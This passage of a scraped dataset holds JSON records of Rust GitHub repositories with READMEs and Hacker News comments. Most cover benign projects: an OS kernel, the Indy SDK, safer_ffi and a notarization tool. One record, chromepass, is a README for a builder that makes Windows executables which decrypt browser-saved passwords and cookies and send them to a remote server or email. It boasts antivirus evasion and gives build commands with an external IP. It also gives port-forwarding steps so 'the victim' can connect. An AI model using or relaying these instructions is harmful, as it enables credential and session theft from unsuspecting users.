druid[1]. I'll open an issue, but do you have any interest in exposing this as a library?[1] https://github.com/xi-editor/druid(The author.) I had originally written a version of this in Python for my own use, and recently thought of rewriting it in Rust as a learning experience.What I found is that writing a CLI in Rust is a absolute breeze, in part due to excellent documentation and the tooling, and also thanks to various well-maintained crates, such as StructOpt [1] to parse command line arguments of any complexity, or indicatif [2] to show animated progress.[1] https://github.com/akeru-inc/xcnotary/blob/11649e49892d81754...[2] https://github.com/akeru-inc/xcnotary/blob/11649e49892d81754...Very cool utility. Rust seems like an odd choice since there's little processing work to be done other than the zipping - which could be outsourced to the \"zip\" tool - but I guess a learning exercise is a learning exercise.There\u2019s also a nice GUI app called \u201cSD Notary\u201d from a well-respected, long-time Mac app developer (Late Night Software, developer of Script Debugger) https://latenightsw.com/sd-notary-notarizing-made-easy/Aside: GitHub seems to dislike your animated SVG for some reason, since it won't play unless I open it manually. I think sanitize=true does that; try hosting it somewhere else?Very cool work! I just manually implemented this in a python script.Does it support other platforms? Will it run on Linux?Thank you for building this. The notarization process is navigable but baroque, especially from the command line.fish shell's notarization script: https://github.com/fish-shell/fish-shell/blob/master/build_t...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Andy-Python-Programmer/aero", "link": "https://github.com/Andy-Python-Programmer/aero", "tags": ["operating-system", "rust", "aero", "unix", "uefi", "hacktoberfest"], "stars": 650, "description": "Aero is a new modern, experimental, unix-like operating system following the monolithic kernel design. Supporting modern PC features such as long mode, 5-level paging, and SMP (multicore), to name a few.", "lang": "Rust", "repo_lang": "", "readme": "

\n \n

\n\n# Aero\n\n**Aero** is a new modern, experimental, unix-like operating system written in Rust. \nAero follows the monolithic kernel design and it is inspired by the Linux Kernel. \nAero supports *modern* PC features such as Long Mode, 5-level paging, \nand SMP (multicore), to name a few.\n\n![workflow](https://github.com/Andy-Python-Programmer/aero/actions/workflows/build.yml/badge.svg)\n[![lines_of_code](https://tokei.rs/b1/github/Andy-Python-Programmer/aero)](https://github.com/Andy-Python-Programmer/aero)\n[![discord](https://img.shields.io/discord/828564770063122432)](https://discord.gg/8gwhTTZwt8)\n\n**Is this a Linux distribution?**\nNo, Aero runs its own kernel that does *not* originate from Linux and does not share any source code or binaries with the Linux kernel.\n\n**Official Discord Server**: \n\n# Screenshots\n\n

Running DWM, mesa-demos and Alacritty in Aero!

\n\n# Features\n- 64-bit higher half kernel\n- 4/5 level paging\n- Preemptive per-cpu scheduler\n- Modern UEFI bootloader\n- ACPI support (ioapic, lapic)\n- Symmetric Multiprocessing (SMP)\n- On-demand paging\n\n# Goals\n\n* Creating a modern, safe, beautiful and fast operating system.\n* Targeting modern 64-bit architectures and CPU features.\n* Good source-level compatibility with Linux so we can port programs over easily.\n* Making a usable OS which can run on real hardware, not just on emulators or virtual machines.\n\n# How to Build and Run Aero\n\nPlease make sure you have a **unix-like** host system before building \nAero. If you are using windows, its highly recommended to use WSL 2.\n\n## Dependencies\n\nBefore building Aero, you need the following things installed:\n- `rust` (should be the **latest nightly**)\n- `nasm`\n- `qemu` (optional: required if you want to run it in the Qemu emulator)\n\nIf you are building Aero with sysroot, run the following helper script to install additional dependencies.\n```sh\n# make sure to run the script with root privileges!\n./tools/deps.sh\n```\nYou can optionally set the environment variable `VERBOSE` to `true`, which will pass through the output of your package manager for troubleshooting.\n```sh\nVERBOSE=true ./tools/deps.sh\n```\n\nNote: If your host operating system is not in the list below, you will need to determine the dependency packages' names for your package manager (contributions to this tool are welcome!)\n- Arch Linux/based (pacman)\n- Debian Linux/based (apt)\n- macOS (homebrew)\n\n\n## Hardware\n\nThe following are *not* requirements but are *recommendations*:\n- ~15GB of free disk space\n- \\>= 8GB RAM\n- \\>= 2 cores\n- Internet access\n\nBeefier machines will lead to much faster builds!\n\n## Getting the source code\n\nThe very first step to work on Aero is to clone the repository:\n```shell\n$ git clone https://github.com/Andy-Python-Programmer/aero\n$ cd aero\n```\n\n## Building Aero\n\nAero uses a custom build system, that wraps `cargo` and takes care of building the kernel and\nuserland for you. It also builds the initramfs and disk image for you.\n\nThe main command we will focus on is `./aero.py`. The source code can be found in the\nroot of the repository and, as the file name states, it is written in Python.\n\nBy default if you run `./aero.py` without any arguments it will build the kernel and userland\nin release mode with debug symbols and run it in QEMU. You can configure the behavior of the \nbuild system though. If you want to, you can use the `--help` option to read a brief description \nof what it can do.\n\nThe build system acknowledges few different build modes, which cannot be used together\nand they are: `--clean`, `--check`, `--test` and `--document`.\n\n- `--clean` option will clean all the build outputs.\n- `--check` will build the kernel and userland using cargo's `check` command,\n this build mode will not produce a disk image, if you want one without actually\n running Aero in the emulator read ahead\n- `--test` will run the built-in Aero test suite\n- `--document` will generate web-based docs using cargo's `doc` command\n- `--sysroot` will build the full userland sysroot. If not passed, then the sysroot will only contain \nthe `aero_shell` and the `init` binaries. \n\n **Note**: This command will require a relatively large amount of storage \nspace. You may want to have upwards of 10 or 15 gigabytes available if building with full sysroot.\n\nEach of these modes can be used with additional flags, that will alter the behavior in different\nways, some of them will not work for some of these modes - for example: the `--la57` option\nwill not have any effect when you are simply checking or documenting the build.\n\n- `--debug` toggles off the release build flag when calling cargo.\n\n **Summary**: If the `--debug` flag is not passed then it will build Aero in release mode\n and debug symbols will be available. On the other hand, if the debug flag is passed\n then it will be built in debug mode and debug symbols will be still available. By default\n Aero is built in release mode (with debug symbols) since it generates faster and smaller\n binaries which are easier to test.\n- `--no-run` prevents from running the built disk image in the emulator\n- `--bios` lets you choose the firmware the emulator will use when booting Aero,\n currently supported values are: `legacy` and `uefi`\n- `--features` accepts a single comma-separated list of kernel crate features, please\n keep in mind that there cannot be spaces in between the values\n- `--target` lets you override the target architecture for which the kernel is built,\n currently the default value is `x86_64-aero_os`\n- `--la57` tells the emulator to use 5 level paging, if it supports it\n\nThe built disk image is stored in the `build` directory under the name `aero.iso`. Both the\ndisk root and initramfs root are preserved in case you want to inspect them manually.\n\n## Running Aero in an emulator\n\nIf you haven't used the `--no-run` option and you aren't using the `--check` or `--document` build\nmode, the build system will run Aero in the emulator for you.\n\n## Nightly Images\n\nWant to give Aero a shot, without building it! You can go to the [latest job](https://github.com/Andy-Python-Programmer/aero/actions/workflows/build.yml?query=is%3Asuccess+branch%3Amaster) and download the latest nightly image (`aero.iso`), under artifacts.\n\n# Contributing\n\nContributions are absolutely, positively welcome and encouraged! Check out [CONTRIBUTING.md](CONTRIBUTING.md) for the contributing guidelines for aero.\n\n# License\n\nAero is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version. See the [LICENSE](LICENSE) file for license rights and limitations.\n", "readme_type": "markdown", "hn_comments": "The Readme is only about building it. Will be nice a list of features (i.e. what can it run).I can't believe you're 14. That's so impressive. Does your programming ability translate over to other subjects in school? Are you ahead of your peers in those areas as well?With 14 I played with a stick. You build an OS. Incredible.Quite impressed. Would be great to know which resources the lad used for learning how to code it.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "darkarp/chromepass", "link": "https://github.com/darkarp/chromepass", "tags": ["computer-engineering", "hacking", "hacking-tool", "password-cracker", "password", "passwords", "google-chrome", "hack", "hacks", "chromepass", "cookies", "av-detection", "hacking-chrome", "python", "hacktoberfest", "hacktoberfest2021", "hacktoberfest-accepted", "phishing", "security"], "stars": 650, "description": "Chromepass - Hacking Chrome Saved Passwords", "lang": "Rust", "repo_lang": "", "readme": "

Chromepass - Hacking Chrome Saved Passwords and Cookies

\n

\t\n \n\t\n\t\"Release\"\n\t\n \n \"Build\n\t\n \n\t
\n \n \n \n \n \"Scrutinizer\n \n \n \n
\n \n\t\"GitHub\n\n\t\"GitHub\n\n
\n \n \n \n
\n View Demo\n \u00b7\n Report Bug\n \u00b7\n Request Feature\n

\n \n \n\n## Table of Contents\n\n* [About the Project](#about-the-project) \n\t* [AV Detection](#av-detection)\n* [Getting started](#getting-started)\n * [Prerequisites](#dependencies-and-requirements)\n * [Installation](#installation)\n* [Usage](#usage)\n* [Email](#email)\n* [Errors, Bugs and Feature Requests](#errors-bugs-and-feature-requests)\n* [Learn More](#learn-more)\n* [License](#license)\n* [Demo](#demo)\n---\n## About The project\nChromepass is a python-based console application that generates a windows executable with the following features:\n\n - Decrypt Google Chrome, Chromium, Edge, Brave, Opera and Vivaldi saved paswords and cookies\n - Send a file with the login/password combinations and cookies remotely (http server or email)\n - Undetectable by AV if done correctly\n - Custom icon\n - Custom error message\n - Customize port\n\n---\n\n### AV Detection! \n\nThe new client build methodology practically ensures a 0% detection rate, even without AV-evasion tactics. If this becomes false in the future, some methods will be implemented to improve AV evasion. \n\nAn example of latest scans (note: within 10-12 hours we go from 0-2 detections to 32 detections so run the analysis on your own builds): \n * [VirusTotal Scan 1](https://www.virustotal.com/gui/file/71d5600e2e9dbdc446aeca554d1f033a69d6f5cf5a7565d317cc22329c084f51/detection)\n * [VirusTotal Scan 2](https://www.virustotal.com/gui/file/f674032061e3d5639d168d68d60a8ff0a53bc249705ec9eb032a385015c20a42/detection)\n * [VirusTotal Scan 3](https://www.virustotal.com/gui/file/462de7fc96d2db7af3400b23d32a75d28909c19e756678f0d2f261efde705165/detection)\n * [VirusTotal Scan 4](https://www.virustotal.com/gui/file/d71a48fb7dc02a14823ceeedd5808e13b6734873f7b1b5c09db433b59eab256e/detection)\n\n ---\n## Getting started\n\n### Dependencies and Requirements\n\nThis is a very simple application, which uses only:\n\n* [Python] - Tested on python 3.9+\n\n>It recommended to perform the installation inside a Windows VM. Some parts of the installation procedure might be affected by existing configurations. This was tested on a clean Windows 10 VM.\n\n### Installation\n\n>Chromepass requires Windows to compile! Support for linux and macOS may be added soon.\n\n#### **Clone the repository**:\n```powershell\ngit clone https://github.com/darkarp/chromepass\n```\n>Note: Alternatively to cloning the repository, you can download the latest release, since the repository may be more bug-prone.\n\n### **Install the dependencies**:\n\nThe dependencies are checked and installed automatically, so you can just skip to [Usage](#usage). It's recommended that you use a clean VM, just to make sure there are no conflicts.\n\nIf you don't have the dependencies and your internet isn't fast, this will take a while. Go grab some coffee. \n\n---\n\n## Usage\n\nChromepass is very straightforward. Start by running:\n```powershell\npython create.py -h\n```\nA list of options will appear and are self explanatory.\n\nRunning without any parameters will build the server and the client connecting to `127.0.0.1`. \n\nA simple example of a build:\n```powershell\npython create.py --ip 92.34.11.220 --error --message 'An Error has happened'\n```\n\nAfter creating the server and the client, make sure you're running the server when the client is ran.\n\nThe cookies and passwords will be saved in `json` files on a new folder called `data` in the same directory as the server, separated by ip address. \n\n-- --\n\n## Email\nChromepass supports sending the files via email, although it's still experimental.\nTo enable this, you can use the `--email` flag while creating the server. You'll need two things, a username (your email) and a password (an app password).\n\nTo generate an app password you must go into your `account settings` -> `Security` and enable 2-step authentication (required!)\n\nAfter 2-step authentication is enabled, you'll see a new option called `App Passwords`:\n![2-step-authentication](https://i.imgur.com/Ip3ShCI.png)\n\nYou want to click there and then choose the appropriate options and then generate a password:\n![2-step-authentication](https://i.imgur.com/DoQQ4Qn.png) \n\nAfter clicking `Generate` it will give you the needed password.\nYou can use the username and password directly in the command or you can simply put it inside the `config.ini`, where it says `YOUR_USERNAME` and `YOUR_PASSWORD`.\n\n### Example with credentials in command\n```powershell\npython create.py --error --message 'An Error has happened' --email --username myuser@gmail.com --password qwertyuiopasdfghh\n```\n### If you put the credentials in the config file (you'll see where if you open this file)\n```powershell\npython create.py --error --message 'An Error has happened' --email\n```\n\n### Remote Notes\n>If you'd like to use this in a remote scenario, you must also perform port forwarding (port 80 by default), so that when the victim runs the client it is able to connect to the server on the correct port. \nFor more general information, click [here](https://www.noip.com/support/knowledgebase/general-port-forwarding-guide/). If you're still not satisfied, perform a google search.\n\n---\n\n## Manual dependency installation\n\nThe automated setup is experimental. For one reason or another, the setup might fail to correctly install the dependencies. If that's the case, you must install them manually. \nFortunately, there are only 2 dependencies: \n - [Microsoft Visual C++ Build Tools](https://visualstudio.microsoft.com/thank-you-downloading-visual-studio/?sku=BuildTools&rel=16) (install with the recommended workflows)\n - [Rustup](https://rustup.rs/)\n\nInstead of the build tools you can also just install visual studio but it will take more space.\n\nAfter successfully installing the build tools, you can simply run the `rustup-init.exe` from [Rustup](https://rustup.rs/)'s website.\n\nThis completes the required dependencies and you should be good to go.\n\n---\n\n## Errors, Bugs and feature requests\n\nIf you find an error or a bug, please report it as an issue.\nIf you wish to suggest a feature or an improvement please report it in the issue pages.\n\nPlease follow the templates shown when creating the issue. \n\n---\n\n\n## Learn More\n\nFor access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran,\njoin our Discord Server: [WhiteHat Hacking](https://discord.gg/beczNYP)\n\nIf you wish to contact me, you can do so via: `mario@whitehathacking.tech` \n\n---\n\n## Disclaimer\nI am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.\n\n## License\n AGPL-3.0 \n\n---\n[![Code Intelligence Status](https://scrutinizer-ci.com/g/darkarp/chromepass/badges/code-intelligence.svg?b=master)](https://scrutinizer-ci.com/code-intelligence) \n\n[Python]: \n\n## Demo\n![til](./templates/resources/demo.gif)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hyperledger/indy-sdk", "link": "https://github.com/hyperledger/indy-sdk", "tags": ["hyperledger-indy", "aries", "ssi", "zkp", "hacktoberfest"], "stars": 649, "description": "indy-sdk", "lang": "Rust", "repo_lang": "", "readme": "# Indy SDK\n![logo](https://raw.githubusercontent.com/hyperledger/indy-node/master/collateral/logos/indy-logo.png)\nThis is the official SDK for [Hyperledger Indy](https://www.hyperledger.org/projects),\nwhich provides a distributed-ledger-based foundation for [self-sovereign identity](https://sovrin.org). Indy provides a software ecosystem for private, secure, and powerful identity, and the Indy SDK enables clients for it.\nThe major artifact of the SDK is a C-callable\nlibrary; there are also convenience wrappers for various programming languages and Indy CLI tool.\n\nAll bugs, stories, and backlog for this project are managed through [Hyperledger's Jira](https://jira.hyperledger.org/secure/RapidBoard.jspa)\nin project IS (note that regular Indy tickets are in the INDY project instead...). Also, make sure to join\nus on [Hyperledger's Rocket.Chat](https://chat.hyperledger.org/) at #indy-sdk to discuss. You will need a Linux Foundation login to get access to these channels\n\n## Understanding Hyperledger Indy\n\nIf you have just started learning about self-sovereign identity, here are some resources to increase your understanding:\n\n* This extended tutorial introduces Indy, explains how the whole ecosystem works, and how the\nfunctions in the SDK can be used to construct rich clients: [Indy-SDK Getting-Started Guide](docs/getting-started/indy-walkthrough.md)\n\n * **Please take note** that this tutorial doesn't cover how sides set up a connection and exchange messages.\n How this communication channel can be built you can find at [Aries](https://github.com/hyperledger/aries) project which describes it in great details.\n\n* Hyperledger Indy Working Group calls happen every Thursday at 8amPT, 9amMT, 11amET, 4pmBST. Add to your calendar and join from any device: https://zoom.us/j/232861185\n\n* A recent webinar explaining self-sovereign identity using Hyperledger Indy and Sovrin: [SSI Meetup Webinar](https://youtu.be/RllH91rcFdE?t=4m30s)\n\n* Visit the main resource for all things \"Indy\" to get acquainted with the code base, helpful resources, and up-to-date information: [Hyperledger Wiki-Indy](https://wiki.hyperledger.org/display/indy/).\n\n* You may also want to look at the [older guide](https://github.com/hyperledger/indy-node/blob/stable/getting-started.md)\nthat explored the ecosystem via command line. That material is being\nrewritten but still contains some useful ideas.\n\n## Items included in this SDK\n\n### libindy\n\nThe major artifact of the SDK is a C-callable library that provides the basic building blocks for\nthe creation of applications on the top of [Hyperledger Indy](https://www.hyperledger.org/projects/hyperledger-indy).\nIt is available for most popular desktop, mobile and server platforms.\n\n### Libindy wrappers\n\nA set of libindy wrappers for developing Indy-based applications in your favorite programming language.\nIndy SDK provides libindy wrappers for the following programming languages and platforms:\n\n* [Java](wrappers/java/README.md)\n* [Python](wrappers/python/README.md)\n* [iOS](wrappers/ios/README.md)\n* [NodeJS](wrappers/nodejs/README.md)\n* [.Net](wrappers/dotnet/README.md)\n* [Rust](wrappers/rust/README.md)\n\n\n### Indy CLI\n\n[Indy CLI](cli/README.md) is the official command line interface that helps Indy developers and administrators.\n\n\n### Libnullpay\n\n[Libnullpay](/libnullpay/README.md) is a libindy plugin that can be used for development of applications that use the Payments API of Indy SDK.\n\n### Libvcx\n[Libvcx](/vcx/README.md) is a c-callable library built on top of libindy that provides a high-level\ncredential exchange protocol. It simplifies creation of agent applications and provides\nbetter agent-2-agent interoperability for [Hyperledger Indy](https://www.hyperledger.org/projects/hyperledger-indy)\ninfrastructure.\n\nThis library is currently in an **experimental** state and is not part of official releases.\n\n### Libvcx wrappers\n\nA set of libvcx wrappers for developing vcx-based applications in your favorite programming language.\n\nIndy SDK provides libvcx wrappers for the following programming languages and platforms:\n\n* [Java](/vcx/wrappers/java/README.md)\n* [Python](/vcx/wrappers/python3/README.md)\n* [iOS](vcx/wrappers/ios/README.md)\n* [NodeJS](/vcx/wrappers/node/README.md)\n\nThese wrappers are currently in **experimental** state and it is not part of official releases.\n\n##### Example use\n- For the main workflow example check [VCX Python demo](https://github.com/hyperledger/indy-sdk/tree/master/vcx/wrappers/python3/demo).\n- Another libvcx example is available as [VCX NodeJS demo](https://github.com/hyperledger/indy-sdk/tree/master/vcx/wrappers/node#run-demo).\n- For mobile see [iOS Demo project](https://github.com/sktston/vcx-demo-ios) \n\n### LibVCX Agency\nLibVCX can be used with \n[mediator agency](https://github.com/hyperledger/aries-rfcs/blob/master/concepts/0046-mediators-and-relays/README.md)\nwhich enables asynchronous communication between 2 parties. \n- [Dummy Cloud Agent](/vcx/dummy-cloud-agent/README.md) is simple implementation of VCX compatible Cloud Agent.\nThe main purpose of this implementation is VCX testing, demos and documentation of VCX protocol.\n- [NodeVCXAgency](https://github.com/AbsaOSS/vcxagencynode) is alternative implementation in NodeJS.\n\n## How-To Tutorials\nShort, simple tutorials that demonstrate how to accomplish common tasks\nare also available. See the [docs/how-tos](docs/how-tos) folder.\n\n1. [Write a DID and Query Its Verkey](docs/how-tos/write-did-and-query-verkey/README.md)\n2. [Rotate a Key](docs/how-tos/rotate-key/README.md)\n3. [Save a Schema and Cred Def](docs/how-tos/save-schema-and-cred-def/README.md)\n4. [Issue a Credential](docs/how-tos/issue-credential/README.md)\n5. [Negotiate a Proof](docs/how-tos/negotiate-proof/README.md)\n6. [Send a Secure Message](docs/how-tos/send-secure-msg/README.md)\n\n## Installing the SDK\n### Release channels\nThe Indy SDK release process defines the following release channels:\n\n* `master` - development builds for each push to master branch.\n* `rc` - release candidates.\n* `stable` - stable releases.\n\nPlease refer to our [release workflow](docs/contributors/release-workflow.md) for more details.\n\n### Ubuntu based distributions (Ubuntu 16.04 and 18.04)\nIt is recommended to install the SDK packages with APT:\n\n sudo apt-get install ca-certificates -y\n sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys CE7709D068DB5E88\n sudo add-apt-repository \"deb https://repo.sovrin.org/sdk/deb (xenial|bionic) {release channel}\"\n sudo apt-get update\n sudo apt-get install -y {library}\n\n* {library} must be replaced with libindy, libnullpay, libvcx or indy-cli.\n* (xenial|bionic) xenial for 16.04 Ubuntu and bionic for 18.04 Ubuntu.\n* {release channel} must be replaced with master, rc or stable to define corresponded release channel.\nPlease See the section \"Release channels\" above for more details.\n\n### Windows\n\n1. Go to `https://repo.sovrin.org/windows/{library}/{release-channel}.`\n2. Download last version of library.\n3. Unzip archives to the directory where you want to save working library.\n4. After unzip you will get next structure of files:\n\n* `Your working directory for libindy`\n * `include`\n * `...`\n * `lib`\n * `indy.dll`\n * `libeay32md.dll`\n * `libsodium.dll`\n * `libzmq.dll`\n * `ssleay32md.dll`\n\n`include` contains c-header files which contains all necessary declarations\nthat may be need for your applications.\n\n`lib` contains all necessary binaries which contains libindy and all it's dependencies.\n `You must add to PATH environment variable path to lib`. It's necessary for dynamic linkage\n your application with libindy.\n\n{release channel} must be replaced with master, rc or stable to define corresponded release channel.\nSee section \"Release channels\" for more details.\n\n{library} must be replaced with libindy, libnullpay, libvcx or indy-cli.\n\n### iOS\n\nSee [wrapper iOS install documentation](wrappers/ios/README.md \"How to install\").\n\n### Android\n\n1. Go to `https://repo.sovrin.org/android/{library}/{release-channel}`.\n2. 3 architecture are supported as of now arm,arm64 and x86.\n3. Download latest version of library.\n4. Unzip archives to the directory where you want to save the `.so` files.\n5. After unzip you will get next structure of files:\n\n* `Your working directory for libindy`\n * `include`\n * `...`\n * `lib`\n * `libindy.so`\n * `libindy_shared.so`\n * `libindy.a`\n\n`include` contains c-header files which contains all necessary declarations\nthat may be need for your applications.\n\n`lib` contains three types of binaries.\n * `libindy.so` - This is a shared library which is statically linked with all the depenedencies.\n You dont need to sidelaod other dependencies like zmq, sodium and openssl to android app if you use this.\n\n * `libindy_shared.so` - This is pure shared library. It is not dynamically linked to its dependencies.\n You need to sideload the binaries with its dependencies. You can download the needed pre-built dependencies from [here](https://github.com/evernym/indy-android-dependencies/tree/v1.0.2)\n * Rename this library to `libindy.so` before loading it into the app. This will help you in having the compatibility with existing wrappers.\n\n * `libindy.a` - This is a static library, which is compiled with NDK.\n\n{library} must be replaced with libindy, libnullpay or libvcx.\n\n [How to use instructions.](https://github.com/hyperledger/indy-sdk/blob/master/docs/build-guides/android-build.md#usage) \n\n{release channel} must be replaced with rc or stable to define corresponded release channel.\nSee section \"Release channels\" for more details.\n\n **Note** :\n\n - [WARNING] This library should be considered as experimental as currently unit tests are *not* executed in the CI phase.\n\n\n### Centos\n\n1. Go to `https://repo.sovrin.org/rpm/{library}/{release-channel}`.\n2. Download and unzip the last version of library.\n3. Install with `rpm -i library-version.rpm`.\n\n{library} must be replaced with libindy, libnullpay, libvcx, indy-cli to define corresponded library.\n\n{release channel} must be replaced with master, rc or stable to define corresponded release channel.\nSee section \"Release channels\" for more details.\n\n### MacOS\n\n1. Go to `https://repo.sovrin.org/macos/{library}/{release-channel}`.\n2. Download the latest version of library.\n3. Unzip archives to the directory where you want to save working library.\n4. After unzip you will get next structure of files:\n\n* `Your working directory`\n * `include` - contains c-header files which contains all necessary declarations that may be need for your applications.\n * `...`\n * `lib` - contains library binaries (static and dynamic).\n * `library.a`\n * `library.dylib`\n \n5. Install dependent libraries: libsodium, zeromq, openssl. The dependent libraries should match the version with what you can find from ``otool -L libindy.dylib``.\n\nYou need add the path to lib folder to LIBRARY_PATH environment variable. \n \n{library} must be replaced with libindy, libnullpay, libvcx or indy-cli to define corresponded library.\n\n{release channel} must be replaced with master, rc or stable to define corresponded release channel.\n \n## How to build Indy SDK from source\n\n* [Ubuntu based distributions (Ubuntu 16.04)](docs/build-guides/ubuntu-build.md)\n* [RHEL based distributions (Centos)](docs/build-guides/rhel-build.md)\n* [Windows](docs/build-guides/windows-build.md)\n* [MacOS](docs/build-guides/mac-build.md)\n* [Android](docs/build-guides/android-build.md)\n\n**Note:**\nBy default `cargo build` produce debug artifacts with a large amount of run-time checks.\nIt's good for development, but this build can be in 100+ times slower for some math calculation.\nIf you would like to analyse CPU performance of libindy for your use case, you have to use release artifacts (`cargo build --release`).\n\n## How to start local nodes pool with docker\nTo test the SDK codebase with a virtual Indy node network, you can start a pool of local nodes using docker:\n\n**Note: If you are getting a PoolLedgerTimeout error it's because the IP addresses in\ncli/docker_pool_transactions_genesis and the pool configuration don't match.\nUse method 3 to configure the IPs of the docker containers to match the pool.**\n\n### 1) Starting the test pool on localhost\nStart the pool of local nodes on `127.0.0.1:9701-9708` with Docker by running:\n\n```\ndocker build -f ci/indy-pool.dockerfile -t indy_pool .\ndocker run -itd -p 9701-9708:9701-9708 indy_pool\n```\n\n### 2) Starting the test pool on a specific IP address\n Dockerfile `ci/indy-pool.dockerfile` supports an optional pool_ip param that allows\n changing ip of pool nodes in generated pool configuration.\n\n You can start the pool with e.g. with the IP address of your development machine's WIFI interface\n so that mobile apps in the same network can reach the pool.\n\n ```\n # replace 192.168.179.90 with your wifi IP address\n docker build --build-arg pool_ip=192.168.179.90 -f ci/indy-pool.dockerfile -t indy_pool .\n docker run -itd -p 192.168.179.90:9701-9708:9701-9708 indy_pool\n ```\n To connect to the pool the IP addresses in /var/lib/indy/sandbox/pool_transactions_genesis (in docker) and\n the pool configuration you use in your mobile app must match.\n\n### 3) Starting the test pool on a docker network\n The following commands allow to start local nodes pool in custom docker network and access this pool\n by custom ip in docker network:\n\n ```\n docker network create --subnet 10.0.0.0/8 indy_pool_network\n docker build --build-arg pool_ip=10.0.0.2 -f ci/indy-pool.dockerfile -t indy_pool .\n docker run -d --ip=\"10.0.0.2\" --net=indy_pool_network indy_pool\n ```\n Note that for Windows and MacOS this approach has some issues. Docker for these OS run in\n their virtual environment. First command creates network for container and host can't\n get access to that network because container placed on virtual machine. You must appropriate set up\n networking on your virtual environment. See the instructions for MacOS below.\n\n### Docker port mapping on MacOS\n\nIf you use some Docker distribution based on Virtual Box you can use Virtual Box's\nport forwarding future to map 9701-9709 container ports to local 9701-9709 ports.\n\nIf you use VMWare Fusion to run Docker locally, follow the instructions from\n[this article](https://medium.com/@tuweizhong/how-to-setup-port-forward-at-vmware-fusion-8-for-os-x-742ad6ca1344)\nand add the following lines to _/Library/Preferences/VMware Fusion/vmnet8/nat.conf_:\n\n```\n# Use these with care - anyone can enter into your VM through these...\n# The format and example are as follows:\n# = :\n#8080 = 172.16.3.128:80\n9701 = :9701\n9702 = :9702\n9703 = :9703\n9704 = :9704\n9705 = :9705\n9706 = :9706\n9707 = :9707\n9708 = :9708\n9709 = :9709\n```\nwhere is your Docker host IP.\n\nDocker machine needs to be rebooted after these changes.\n\n## Wrappers documentation\n\nThe following [wrappers](docs/architecture/language-bindings.md) are tested and complete. \n\nThere is also active work on a wrapper for Go; visit\n[#indy-sdk on Rocket.Chat](https://chat.hyperledger.org/channel/indy-sdk) for\ndetails.\n\n## Indy CLI documentation\n* An explanation of how to install the official command line interface for that provides commands to manage wallets and interactions with the ledger: [Indy CLI](cli/README.md)\n\n## How to migrate\nThe documents that provide necessary information for Libindy migrations.\n \n* [v1.3.0 \u2192 v1.4.0](docs/migration-guides/migration-guide-1.3.0-1.4.0.md)\n* [v1.4.0 \u2192 v1.5.0](docs/migration-guides/migration-guide-1.4.0-1.5.0.md)\n* [v1.5.0 \u2192 v1.6.x](docs/migration-guides/migration-guide-1.5.0-1.6.0.md)\n* [v1.6.0 \u2192 v1.7.x](docs/migration-guides/migration-guide-1.6.0-1.7.0.md)\n* [v1.7.0 \u2192 v1.8.x](docs/migration-guides/migration-guide-1.7.0-1.8.0.md)\n* [v1.8.0 \u2192 v1.9.x](docs/migration-guides/migration-guide-1.8.0-1.9.0.md)\n* [v1.9.0 \u2192 v1.10.x](docs/migration-guides/migration-guide-1.9.0-1.10.0.md)\n* [v1.10.0 \u2192 v1.11.x](docs/migration-guides/migration-guide-1.10.0-1.11.0.md)\n* [v1.11.0 \u2192 v1.12.x](docs/migration-guides/migration-guide-1.11.0-1.12.0.md)\n* [v1.12.0 \u2192 v1.13.x](docs/migration-guides/migration-guide-1.12.0-1.13.0.md)\n* [v1.13.0 \u2192 v1.14.x](docs/migration-guides/migration-guide-1.13.0-1.14.0.md)\n* [v1.14.0 \u2192 v1.15.x](docs/migration-guides/migration-guide-1.14.0-1.15.0.md)\n* [v1.15.0 \u2192 v1.16.x](docs/migration-guides/migration-guide-1.15.0-1.16.0.md)\n\n## How to Contribute\n* We'd love your help; see these [HL Indy Wiki](https://wiki.hyperledger.org/display/indy/How+to+Contribute) and [slides on how to contribute](http://bit.ly/2ugd0bq).\n* If you need to add a new call, read this [instruction](docs/how-tos/how-to-add-a-new-API-call.md).\n* You may also want to read this info about [maintainers](MAINTAINERS.md) and our process.\n* We use developer certificate of origin (DCO) in all hyperledger repositories,\n so to get your pull requests accepted, you must certify your commits by signing off on each commit.\n More information can be found in [Signing Commits](docs/contributors/signing-commits.md) article.\n\n\n#### Notes\n* Libindy implements multithreading approach based on **mpsc channels**.\nIf your application needs to use Libindy from multiple processes you should keep in mind the following restrictions:\n * Fork - duplicates only the main thread. So, child threads will not be duplicated.\n If any out-of-process requirements are possible, the caller must fork first **before any calls to Libindy**\n (otherwise the command from a child thread will hang). Fork is only available on Unix.\n * Popen - spawns a new OS level process which will create its own child threads. Popen is cross-platform.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "getditto/safer_ffi", "link": "https://github.com/getditto/safer_ffi", "tags": [], "stars": 649, "description": "Write safer FFI code in Rust without polluting it with unsafe code", "lang": "Rust", "repo_lang": "", "readme": "\n\n![safer-ffi-banner](\nhttps://github.com/getditto/safer_ffi/blob/banner/guide/assets/safer_ffi.jpg?raw=true)\n\n[![CI](\nhttps://github.com/getditto/safer_ffi/workflows/CI/badge.svg?branch=master)](\nhttps://github.com/getditto/safer_ffi/actions)\n[![guide](https://img.shields.io/badge/guide-mdbook-blue)](\nhttps://getditto.github.io/safer_ffi)\n[![docs-rs](https://docs.rs/safer-ffi/badge.svg)](\nhttps://getditto.github.io/safer_ffi/rustdoc/safer_ffi)\n[![crates-io](https://img.shields.io/crates/v/safer-ffi.svg)](\nhttps://crates.io/crates/safer-ffi)\n[![repository](https://img.shields.io/badge/repository-GitHub-brightgreen.svg)](\nhttps://github.com/getditto/safer_ffi)\n\n\n\n# What is `safer_ffi`?\n\n`safer_ffi` is a framework that helps you write foreign function interfaces (FFI) without polluting your Rust code with `unsafe { ... }` code blocks while making functions far easier to read and maintain.\n\n> [\ud83d\udcda Read The User Guide \ud83d\udcda][user guide]\n\n[user guide]: https://getditto.github.io/safer_ffi\n\n## Prerequisites\n\nMinimum Supported Rust Version: `1.60.0`\n\n# Quickstart\n\n
